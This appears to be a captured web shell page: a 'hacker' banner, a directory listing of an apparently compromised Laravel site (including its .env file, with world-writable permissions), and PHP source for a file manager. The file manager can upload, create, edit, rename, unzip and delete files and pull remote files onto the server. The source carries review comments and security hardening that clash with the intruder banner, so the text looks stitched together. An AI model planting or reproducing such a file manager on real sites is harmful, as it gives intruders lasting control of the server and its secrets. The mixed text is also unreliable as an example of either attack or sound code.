I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
Access Denied
Secure Access Required
');
}
} else {
echo '
Access Denied
Secure Access Required
';
exit;
}
}
}
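// Handle file content retrieval for editing.
//
// Streams the raw bytes of a single file back as text/plain and ends the request.
// The path is built from two client-controlled query parameters ("workspace" and
// "item"), so the resolved path must be confined to the same root the workspace
// handler enforces (the directory holding this script). Without that check any
// file readable by the PHP process could be requested.
// NOTE(review): whatever access gate precedes this handler lies outside this
// excerpt; confirm it runs before this block is reached.
if (isset($_GET['operation'], $_GET['item']) && $_GET['operation'] === 'retrieve_file_content') {
    $retrievalRoot = realpath(__DIR__);

    // Non-string parameters (e.g. workspace[]=x) are treated as absent/empty
    // instead of being passed to string concatenation.
    $requestedWorkspace = (isset($_GET['workspace']) && is_string($_GET['workspace']))
        ? $_GET['workspace']
        : (string) $retrievalRoot;
    $requestedItem = is_string($_GET['item']) ? $_GET['item'] : '';

    // realpath() resolves "..", symlinks and duplicate separators, so the
    // containment test below is applied to the path that would actually be opened.
    $validatedPath = realpath($requestedWorkspace . '/' . $requestedItem);

    // Compare against "<root>/" rather than "<root>" so a sibling directory that
    // merely shares the prefix (root "/srv/app" vs "/srv/app-old") is not accepted.
    $rootPrefix = rtrim((string) $retrievalRoot, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $insideRoot = $retrievalRoot !== false
        && $validatedPath !== false
        && strncmp($validatedPath, $rootPrefix, strlen($rootPrefix)) === 0;

    if ($insideRoot && is_file($validatedPath) && is_readable($validatedPath)) {
        header('Content-Type: text/plain');
        // Keep browsers from re-interpreting the body as HTML or script.
        header('X-Content-Type-Options: nosniff');
        echo file_get_contents($validatedPath);
        exit;
    } else {
        // Same response for "missing", "unreadable" and "outside the root" so the
        // handler does not reveal which paths exist elsewhere on the host.
        http_response_code(404);
        echo "Item not found or not readable.";
        exit;
    }
}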
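// Handle current workspace (directory)
//
// Resolves the directory every later operation works in. The client may pick it
// through ?workspace=, but the resolved path has to be the script's directory or
// something beneath it; anything else falls back to the script's directory.
$baseDir = realpath(__DIR__); // Restrict to script's directory
if (isset($_GET['workspace'])) {
    // A non-string value (workspace[]=x) is treated as an invalid request.
    $currentWorkspace = is_string($_GET['workspace']) ? realpath($_GET['workspace']) : false;
} else {
    $currentWorkspace = $baseDir;
}
// A bare prefix test would also accept siblings such as "<base>-backup"; require
// either an exact match or a match on "<base>/" so only real descendants pass.
$baseDirPrefix = rtrim((string) $baseDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
$workspaceInsideBase = is_string($currentWorkspace)
    && ($currentWorkspace === $baseDir || strncmp($currentWorkspace, $baseDirPrefix, strlen($baseDirPrefix)) === 0);
if (!$currentWorkspace || !is_dir($currentWorkspace) || !is_readable($currentWorkspace) || !$workspaceInsideBase) {
    $currentWorkspace = $baseDir;
    $alertMessage = "Invalid or inaccessible workspace. Reverted to default workspace.";
}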
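// File operations
//
// Every state-changing action below runs only for a POST request whose csrf_token
// field matches the token held in the session. Each action builds its target as
// $currentWorkspace . '/' . <cleaned name>, so the cleaned name must never be
// empty, "." or "..": purifyFileName() keeps dots, and those values would point
// the action at the workspace itself or at its parent directory.
// NOTE(review): create, rename, edit and unzip do not consult $allowedFileTypes,
// so the extension allow-list applied to uploads and remote fetches can be
// bypassed through them; confirm whether that is intended.
$expectedCsrfToken = (isset($_SESSION['csrf_token']) && is_string($_SESSION['csrf_token'])) ? $_SESSION['csrf_token'] : '';
$suppliedCsrfToken = (isset($_POST['csrf_token']) && is_string($_POST['csrf_token'])) ? $_POST['csrf_token'] : '';
// hash_equals() compares in constant time; an empty or missing session token never matches.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $expectedCsrfToken !== '' && hash_equals($expectedCsrfToken, $suppliedCsrfToken)) {
    // Returns the cleaned name, or '' when the input is not a string or cleans
    // down to nothing but dots (covers '', '.' and '..').
    $toSafeName = static function ($rawName) {
        if (!is_string($rawName)) {
            return '';
        }
        $cleanName = (string) purifyFileName($rawName);
        return trim($cleanName, '.') === '' ? '' : $cleanName;
    };

    // Create directory
    if (isset($_POST['add_directory']) && !empty($_POST['folder_name'])) {
        $folderName = $toSafeName($_POST['folder_name']);
        $newFolderPath = $currentWorkspace . '/' . $folderName;
        if ($folderName === '') {
            $alertMessage = "Failed to create folder.";
        } elseif (!is_dir($newFolderPath)) {
            if (mkdir($newFolderPath, 0755)) {
                $alertMessage = "Folder created successfully.";
            } else {
                $alertMessage = "Failed to create folder.";
            }
        } else {
            $alertMessage = "Folder already exists.";
        }
    }

    // Create file
    // The content is written verbatim and the extension is not restricted here.
    if (isset($_POST['add_file']) && !empty($_POST['item_name'])) {
        $itemName = $toSafeName($_POST['item_name']);
        $itemContent = $_POST['item_content'] ?? '';
        $newItemPath = $currentWorkspace . '/' . $itemName;
        if ($itemName === '') {
            $alertMessage = "Failed to create file.";
        } elseif (!file_exists($newItemPath)) {
            if (file_put_contents($newItemPath, $itemContent) !== false) {
                $alertMessage = "File created successfully.";
            } else {
                $alertMessage = "Failed to create file.";
            }
        } else {
            $alertMessage = "File already exists.";
        }
    }

    // Upload file
    // Only the final extension of the client-supplied name is checked against the
    // allow-list; the file's content is not inspected.
    if (isset($_FILES['uploaded_item']) && $_FILES['uploaded_item']['error'] === UPLOAD_ERR_OK) {
        $uploadedItem = $_FILES['uploaded_item'];
        $fileExt = strtolower(pathinfo($uploadedItem['name'], PATHINFO_EXTENSION));
        $storedName = $toSafeName($uploadedItem['name']);
        if ($storedName !== '' && in_array($fileExt, $allowedFileTypes, true) && $uploadedItem['size'] <= $maxUploadSize) {
            $destinationPath = $currentWorkspace . '/' . $storedName;
            if (!file_exists($destinationPath)) {
                if (move_uploaded_file($uploadedItem['tmp_name'], $destinationPath)) {
                    $alertMessage = "Item uploaded successfully.";
                } else {
                    $alertMessage = "Error uploading item.";
                }
            } else {
                $alertMessage = "File already exists.";
            }
        } else {
            $alertMessage = "Invalid file type or size exceeds limit.";
        }
    }

    // Rename item
    // The new extension is not checked, so an uploaded file can be given any extension afterwards.
    if (isset($_POST['rename_item']) && !empty($_POST['original_name']) && !empty($_POST['new_name'])) {
        $originalName = $toSafeName($_POST['original_name']);
        $newName = $toSafeName($_POST['new_name']);
        $originalPath = $currentWorkspace . '/' . $originalName;
        $newPath = $currentWorkspace . '/' . $newName;
        if ($originalName !== '' && $newName !== '' && file_exists($originalPath) && !file_exists($newPath)) {
            if (rename($originalPath, $newPath)) {
                $alertMessage = "Item renamed successfully.";
            } else {
                $alertMessage = "Error renaming item.";
            }
        } else {
            $alertMessage = "Invalid source or destination name.";
        }
    }

    // Delete item
    if (isset($_POST['delete_item']) && !empty($_POST['item_name'])) {
        $itemName = $toSafeName($_POST['item_name']);
        $itemPath = $currentWorkspace . '/' . $itemName;
        // The is_link() test keeps a dangling symlink deletable even though file_exists() reports it missing.
        if ($itemName !== '' && (file_exists($itemPath) || is_link($itemPath))) {
            if (is_dir($itemPath) && !is_link($itemPath)) {
                $deleteSuccess = deleteDirectory($itemPath);
                $alertMessage = $deleteSuccess ? "Folder deleted successfully." : "Error deleting folder.";
            } elseif (is_file($itemPath) || is_link($itemPath)) {
                // A symlink is removed as a link; its target is never descended into.
                if (unlink($itemPath)) {
                    $alertMessage = "File deleted successfully.";
                } else {
                    $alertMessage = "Error deleting file.";
                }
            }
        } else {
            $alertMessage = "Item not found.";
        }
    }

    // Unzip archive
    // NOTE(review): extracted entries are not checked against $allowedFileTypes or
    // $maxUploadSize, and existing files in the workspace may be overwritten.
    if (isset($_POST['unzip_archive']) && !empty($_POST['archive_name'])) {
        $archiveName = $toSafeName($_POST['archive_name']);
        $archivePath = $currentWorkspace . '/' . $archiveName;
        if ($archiveName !== '' && is_file($archivePath) && class_exists('ZipArchive')) {
            $archive = new ZipArchive;
            if ($archive->open($archivePath) === TRUE) {
                $extracted = $archive->extractTo($currentWorkspace);
                $archive->close();
                $alertMessage = $extracted ? "Archive extracted successfully." : "Error extracting archive.";
            } else {
                $alertMessage = "Failed to open archive.";
            }
        } else {
            $alertMessage = "Archive not found or ZipArchive not available.";
        }
    }

    // Fetch remote item
    // FILTER_VALIDATE_URL accepts any scheme, including file://, so the scheme is
    // pinned to http/https before the URL reaches file_get_contents().
    // NOTE(review): the server still connects to whatever host the client names,
    // including internal addresses; restrict destinations if this must stay enabled.
    if ($enableRemoteFetch && isset($_POST['fetch_remote']) && !empty($_POST['remote_url'])) {
        $remoteUrl = is_string($_POST['remote_url']) ? filter_var($_POST['remote_url'], FILTER_VALIDATE_URL) : false;
        $remoteScheme = $remoteUrl ? strtolower((string) parse_url($remoteUrl, PHP_URL_SCHEME)) : '';
        if ($remoteUrl && in_array($remoteScheme, ['http', 'https'], true)) {
            // Derive the name from the URL path only, so a query string cannot end up in the file name or extension.
            $itemName = $toSafeName(basename((string) parse_url($remoteUrl, PHP_URL_PATH)));
            $localItemPath = $currentWorkspace . '/' . $itemName;
            $fileExt = strtolower(pathinfo($itemName, PATHINFO_EXTENSION));
            if ($itemName !== '' && in_array($fileExt, $allowedFileTypes, true) && !file_exists($localItemPath)) {
                // Read at most one byte past the upload limit so an oversized body is detected without buffering all of it.
                $remoteContent = @file_get_contents($remoteUrl, false, null, 0, $maxUploadSize + 1);
                if ($remoteContent !== false && strlen($remoteContent) <= $maxUploadSize && file_put_contents($localItemPath, $remoteContent) !== false) {
                    $alertMessage = "Item downloaded successfully.";
                } else {
                    $alertMessage = "Error downloading item.";
                }
            } else {
                $alertMessage = "Invalid file type or file already exists.";
            }
        } else {
            $alertMessage = "Invalid remote URL.";
        }
    }

    // Edit file
    // Overwrites an existing regular file with the submitted content; the extension is not restricted here.
    if (isset($_POST['modify_file']) && !empty($_POST['item_name'])) {
        $itemName = $toSafeName($_POST['item_name']);
        $itemContent = $_POST['item_content'] ?? '';
        $itemPath = $currentWorkspace . '/' . $itemName;
        if ($itemName !== '' && is_file($itemPath) && is_writable($itemPath)) {
            if (file_put_contents($itemPath, $itemContent) !== false) {
                $alertMessage = "File updated successfully.";
            } else {
                $alertMessage = "Error updating file.";
            }
        } else {
            $alertMessage = "File not found or not writable.";
        }
    }
}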
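// List workspace contents
//
// Splits the entries of $currentWorkspace into two alphabetically sorted lists,
// $folders and $files, skipping the "." and ".." pseudo-entries.
$items = scandir($currentWorkspace);
if ($items === false) {
    // scandir() returns false when the directory cannot be read (for example it
    // was removed by an earlier operation in this request); show an empty listing.
    $items = [];
}
$folders = [];
$files = [];
foreach ($items as $item) {
    if ($item === '.' || $item === '..') {
        continue;
    }
    $itemPath = $currentWorkspace . '/' . $item;
    // is_dir() follows symlinks, so a link to a directory is listed as a folder.
    if (is_dir($itemPath)) {
        $folders[] = $item;
    } else {
        $files[] = $item;
    }
}
sort($folders);
sort($files);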
// Helper functions
/**
 * Reduce a client-supplied name to the characters a-z, A-Z, 0-9, ".", "_" and "-".
 *
 * Surrounding whitespace is trimmed first; every other character is dropped
 * rather than replaced, so path separators never survive. Dots are kept, which
 * means "." and ".." come back unchanged and a name made only of rejected
 * characters comes back as "". Callers that append the result to a directory
 * have to reject those values themselves.
 *
 * @param string $name Raw name as received from the request.
 * @return string|null Result of preg_replace() on the trimmed name.
 */
function purifyFileName($name) {
    $trimmedName = trim($name);
    $allowedOnly = preg_replace('/[^a-zA-Z0-9._-]/', '', $trimmedName);

    return $allowedOnly;
}
/**
 * Format a byte count for display using binary units (1 KB = 1024 bytes).
 *
 * Values of 1024 and above are shown with two decimals in the largest unit that
 * fits (KB, MB or GB); smaller values are shown as a plain count of bytes.
 *
 * @param int|float $bytes Size in bytes.
 * @return string Human-readable size, e.g. "1.50 KB" or "512 bytes".
 */
function humanizeFileSize($bytes) {
    // Largest unit first, so the first threshold reached decides the unit.
    $unitTable = [
        [1073741824, ' GB'],
        [1048576, ' MB'],
        [1024, ' KB'],
    ];

    foreach ($unitTable as $unitRow) {
        $threshold = $unitRow[0];
        $suffix = $unitRow[1];
        if ($bytes >= $threshold) {
            return number_format($bytes / $threshold, 2) . $suffix;
        }
    }

    return $bytes . ' bytes';
}
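/**
 * Build the "Root / a / b" breadcrumb string for a path inside $baseDir.
 *
 * @param string $path    Absolute path being displayed.
 * @param string $baseDir Absolute root that $path must equal or lie beneath.
 * @return string Crumbs joined by " / ", or "Invalid path" when $path is not
 *                $baseDir itself or one of its descendants.
 */
function buildPathCrumbs($path, $baseDir) {
    // Ensure path is within baseDir. Matching on "<base>/" instead of "<base>"
    // keeps a sibling that only shares the prefix ("<base>-backup") out.
    $basePrefix = rtrim($baseDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($path !== $baseDir && strncmp($path, $basePrefix, strlen($basePrefix)) !== 0) {
        return 'Invalid path';
    }
    // Get relative path from baseDir
    $relativePath = (string) substr($path, strlen($baseDir));
    // Drop only empty segments; a plain array_filter() would also discard a directory named "0".
    $segments = array_filter(
        explode(DIRECTORY_SEPARATOR, $relativePath),
        static function ($segment) {
            return $segment !== '';
        }
    );
    $crumbs = [];
    $pathBuilder = $baseDir;
    // Root crumb
    $crumbs[] = 'Root';
    // Build crumbs for each segment
    foreach ($segments as $segment) {
        $pathBuilder .= DIRECTORY_SEPARATOR . $segment;
        // Segment names come from the filesystem and are echoed into the page, so
        // they are escaped with explicit flags instead of the version-dependent default.
        $escapedSegment = htmlspecialchars($segment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        // NOTE(review): both branches emit the same text in this copy of the file;
        // the surrounding markup that told them apart appears to be missing.
        if (is_dir($pathBuilder) && is_readable($pathBuilder)) {
            $crumbs[] = '' . $escapedSegment . '';
        } else {
            $crumbs[] = '' . $escapedSegment . '';
        }
    }
    return implode(' / ', $crumbs);
}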
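/**
 * Recursively delete a directory tree, or a single file.
 *
 * Symbolic links are removed as links and never followed, so deleting a tree
 * cannot reach files that live outside it through a link placed inside it.
 *
 * @param string $dir Path of the directory (or file) to remove.
 * @return bool True when the path is gone afterwards (including when it never
 *              existed), false as soon as any entry cannot be removed.
 */
function deleteDirectory($dir) {
    // Checked first: is_dir() and file_exists() both follow links, so a link to a
    // directory would otherwise be recursed into and a dangling link skipped.
    if (is_link($dir)) {
        return unlink($dir);
    }
    if (!file_exists($dir)) {
        return true;
    }
    if (!is_dir($dir)) {
        return unlink($dir);
    }

    $entries = scandir($dir);
    if ($entries === false) {
        // Unreadable directory: report failure instead of iterating over false.
        return false;
    }
    foreach ($entries as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }
        if (!deleteDirectory($dir . '/' . $item)) {
            return false;
        }
    }

    return rmdir($dir);
}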
?>
Vivid Workspace Manager
Vivid Workspace Manager
New Folder
Upload Item
Fetch Remote Item